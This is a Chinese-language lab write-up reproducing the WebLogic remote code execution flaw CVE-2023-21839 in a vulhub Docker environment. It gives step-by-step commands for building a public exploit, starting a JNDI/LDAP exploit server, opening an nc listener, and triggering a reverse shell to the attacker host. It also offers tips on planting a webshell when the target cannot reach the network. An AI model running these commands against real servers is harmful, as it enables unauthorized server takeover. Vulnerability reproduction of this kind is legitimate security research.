0x01 前言
WebLogic 存在远程代码执行漏洞(CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。
0x02 影响范围
WebLogic_Server = 12.2.1.3.0
WebLogic_Server = 12.2.1.4.0
WebLogic_Server = 14.1.1.0.0
0x03 漏洞环境
此处用vulhub中的CVE-2020-14882的环境
docker-compose up -d
0x04 漏洞复现
exp
https://github.com/4ra1n/CVE-2023-21839
cd CVE-2023-21839/cmd
go build -o CVE-2023-21839.exe
查看JNDIExploit-1.4-SNAPSHOT.jar的功能
java -jar JNDIExploit-1.4-SNAPSHOT.jar -u
先在攻击机上启动JNDI
java -jar JNDIExploit-1.4-SNAPSHOT.jar -i vps的IP
java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.120.129
在vps上监听一个端口
nc -lvvp 45263
攻击机执行如下命令
CVE-2023-21839.exe -ip 目标IP -port 目标端口-ldap ldap://vps的IP:1389/Basic/ReverseShell/vps的IP/监听的端口
CVE-2023-21839.exe -ip 192.168.120.133 -port 7001 -ldap ldap://192.168.120.129:1389/Basic/ReverseShell/192.168.120.129/45263
成功反弹shell
0x05 漏洞总结
- 利用前最好先判断weblogic的版本
- 如果目标不出网,怎么办?可以尝试写入webshell
- 写shell,需要先判断网站的路径,即往哪个路径写文件